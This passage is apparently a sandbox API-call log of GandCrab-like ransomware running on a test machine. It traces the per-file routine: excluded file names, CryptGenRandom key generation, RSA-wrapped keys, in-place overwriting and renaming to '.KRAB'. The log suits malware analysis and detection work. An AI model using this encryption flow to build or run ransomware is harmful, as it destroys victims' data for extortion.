lpString2="KRAB-DECRYPT.html") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="ntldr") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="NTDETECT.COM") returned -1 [0098.965] lstrcmpiW (lpString1="IRpB4BeeLt.mkv", lpString2="Bootfont.bin") returned 1 [0098.965] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.965] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0098.966] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.966] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.966] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.966] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.966] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0098.967] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.967] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0098.967] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.968] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.968] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.968] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.968] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0098.968] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.968] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0098.969] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.969] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.969] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.969] GetLastError () returned 0x0 [0098.969] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.969] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0098.969] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.970] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.970] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.970] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.970] GetLastError () returned 0x0 [0098.970] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.970] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.970] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\irpb4beelt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.971] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.971] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.971] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x8e94, lpOverlapped=0x0) returned 1 [0098.983] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff716c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.983] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x8e94, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x8e94, lpOverlapped=0x0) returned 1 [0098.984] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.984] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.999] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.999] CloseHandle (hObject=0x434) returned 1 [0099.000] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.000] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\irpb4beelt.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\IRpB4BeeLt.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\irpb4beelt.mkv.krab")) returned 1 [0099.004] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.004] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.004] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.004] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.004] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt" [0099.004] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.004] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt.KRAB") returned 50 [0099.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt") returned 45 [0099.005] lstrlenW (lpString=".txt") returned 4 [0099.005] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.005] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.005] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt") returned 45 [0099.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\KRAB-DECRYPT.txt") returned 45 [0099.005] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.005] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.005] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.005] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.005] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.006] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.006] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.006] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.006] lstrcmpW (lpString1="ltzwV9YVPTug.mp4", lpString2=".") returned 1 [0099.006] lstrcmpW (lpString1="ltzwV9YVPTug.mp4", lpString2="..") returned 1 [0099.006] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="ltzwV9YVPTug.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4" [0099.006] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.006] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4.KRAB") returned 50 [0099.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4") returned 45 [0099.007] lstrlenW (lpString=".mp4") returned 4 [0099.007] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.007] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0099.007] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4") returned 45 [0099.007] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4") returned 45 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="desktop.ini") returned 1 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="autorun.inf") returned 1 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="ntuser.dat") returned -1 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="iconcache.db") returned 1 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="bootsect.bak") returned 1 [0099.007] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="boot.ini") returned 1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="ntuser.dat.log") returned -1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="thumbs.db") returned -1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="ntldr") returned -1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="NTDETECT.COM") returned -1 [0099.008] lstrcmpiW (lpString1="ltzwV9YVPTug.mp4", lpString2="Bootfont.bin") returned 1 [0099.008] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.008] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.009] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.009] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.009] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.009] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.009] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.009] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.010] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0099.010] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.011] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.011] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.011] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.011] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.011] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.011] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0099.011] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0099.012] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.012] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.012] GetLastError () returned 0x0 [0099.012] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.012] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.012] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010e80) returned 1 [0099.012] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.012] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.012] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.013] GetLastError () returned 0x0 [0099.013] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.013] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0099.013] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ltzwv9yvptug.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.015] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.015] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x2847, lpOverlapped=0x0) returned 1 [0099.050] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd7b9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.050] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2847, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x2847, lpOverlapped=0x0) returned 1 [0099.055] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.055] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.059] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.062] CloseHandle (hObject=0x434) returned 1 [0099.062] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.063] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ltzwv9yvptug.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ltzwV9YVPTug.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ltzwv9yvptug.mp4.krab")) returned 1 [0099.065] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.066] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.066] lstrcmpW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2=".") returned 1 [0099.066] lstrcmpW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="..") returned 1 [0099.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="LWv8Gyj-GU7qhFGKVALQ.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4" [0099.066] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.066] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4.KRAB") returned 58 [0099.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4") returned 53 [0099.067] lstrlenW (lpString=".mp4") returned 4 [0099.067] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.067] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0099.067] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4") returned 53 [0099.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4") returned 53 [0099.067] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="desktop.ini") returned 1 [0099.067] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="autorun.inf") returned 1 [0099.067] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="ntuser.dat") returned -1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="iconcache.db") returned 1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="bootsect.bak") returned 1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="boot.ini") returned 1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="ntuser.dat.log") returned -1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="thumbs.db") returned -1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0099.068] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.069] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.069] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="ntldr") returned -1 [0099.069] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="NTDETECT.COM") returned -1 [0099.069] lstrcmpiW (lpString1="LWv8Gyj-GU7qhFGKVALQ.mp4", lpString2="Bootfont.bin") returned 1 [0099.069] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.069] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0099.070] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.071] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.071] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.071] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.071] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.071] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.072] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.072] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.074] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.074] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.074] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.074] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.074] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.075] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0099.092] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.092] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.092] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.093] GetLastError () returned 0x0 [0099.093] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.093] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.093] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0099.094] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.094] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.094] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.095] GetLastError () returned 0x0 [0099.095] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.095] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0099.095] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\lwv8gyj-gu7qhfgkvalq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.096] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.096] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.097] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xd467, lpOverlapped=0x0) returned 1 [0099.109] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff2b99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.110] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd467, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xd467, lpOverlapped=0x0) returned 1 [0099.110] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, 